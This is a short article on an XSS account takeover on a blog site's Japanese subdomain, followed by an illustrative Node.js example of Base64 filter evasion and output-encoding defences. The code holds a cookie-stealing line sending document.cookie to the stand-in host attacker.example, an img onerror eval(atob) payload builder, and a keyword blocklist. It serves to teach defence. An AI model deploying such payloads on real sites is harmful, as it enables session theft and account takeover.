A security researcher identified a way to exploit cross-site scripting (XSS), a common vulnerability that lets an attacker inject script into a web page viewed by other users, to take control of more than 100 accounts on a popular blog site’s Japanese subdomain.
The researcher bypassed some of the usual safeguards against XSS by Base64-encoding the payload. Filters that reject recognisable keywords, such as a script tag or a reference to document.cookie, do not match text that is only decoded back into JavaScript once it runs in the victim’s browser, so some filters let the encoded payload through.
With one account compromised, the injected JavaScript stole the authentication cookies of users who viewed the affected page, and those cookies were then used to take over the other accounts.
This highlights the need for thorough testing of web applications for vulnerabilities like XSS, and for defences that do not rely on spotting known-bad strings: a blocklist that a Base64 wrapper can evade is not a fix. Encoding untrusted data for the context it is rendered in neutralises the payload whatever encoding it uses internally, a Content Security Policy limits what injected script can do, and the HttpOnly flag keeps session cookies out of reach of document.cookie.
It is also essential to keep software up to date and to prioritise fixing security vulnerabilities to protect users’ data and prevent attacks.
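The filter-evasion pattern the article describes, and the output encoding that defeats it, as an added JavaScript example for Node.js. This is not code from the article or from the affected site: the keyword blocklist is a toy stand-in for the kind of filter that was bypassed, the cookie-stealing payload and the `attacker.example` host are constructed for illustration, and `escapeHtml` is a generic HTML-body/attribute encoder, not the site’s own fix.

```javascript
// Added example (not from the article or the affected site): a toy keyword
// blocklist, the kind of filter a Base64-wrapped payload slips past, next to
// the output encoding that neutralises the payload however it is encoded.
// All payloads and hostnames here are constructed for illustration.

// Keywords a naive blocklist filter might reject.
const BLOCKED_KEYWORDS = ['<script', 'javascript:', 'document.cookie', 'alert('];

// Returns true if the blocklist would let the input through.
function passesBlocklist(input) {
  const lower = input.toLowerCase();
  return !BLOCKED_KEYWORDS.some((k) => lower.includes(k));
}

// What the attacker actually wants to run in the victim's browser: send the
// session cookie to a server they control (hypothetical host).
const STEALER_SOURCE =
  "new Image().src='https://attacker.example/c?'+encodeURIComponent(document.cookie)";

// Build the delivered payload. The script is Base64-encoded and only decoded
// (atob) and executed (eval) inside the victim's browser, so none of the
// blocked keywords appear in the submitted text: Base64 output contains no
// '<', '.', ':' or '('. An onerror handler on a broken <img> avoids the
// <script tag altogether.
function buildEncodedPayload(source) {
  const b64 = Buffer.from(source, 'utf8').toString('base64');
  return `<img src=x onerror="eval(atob('${b64}'))">`;
}

// Defender-side check: the blocked terms are still there, one decode away.
// Shown to make the point that a blocklist can always be out-encoded; it is
// not a recommended defence.
function decodesToBlockedContent(payload) {
  const m = payload.match(/atob\('([A-Za-z0-9+\/=]+)'\)/);
  if (!m) return false;
  const decoded = Buffer.from(m[1], 'base64').toString('utf8');
  return !passesBlocklist(decoded);
}

// The actual fix: contextual output encoding for HTML body/attribute content.
// Rendered this way, the payload is displayed as text and never parsed as
// markup, whatever encoding tricks were used inside it.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

const payload = buildEncodedPayload(STEALER_SOURCE);
console.log('blocklist allows payload:', passesBlocklist(payload));            // true
console.log('decoded payload is malicious:', decodesToBlockedContent(payload)); // true
console.log('escaped for HTML output:', escapeHtml(payload));
```

Pair the output encoding with the `HttpOnly` flag on the session cookie (for example `Set-Cookie: session=...; HttpOnly; Secure; SameSite=Lax`): even if a payload does execute, `document.cookie` then no longer exposes the session token that made the account takeovers possible.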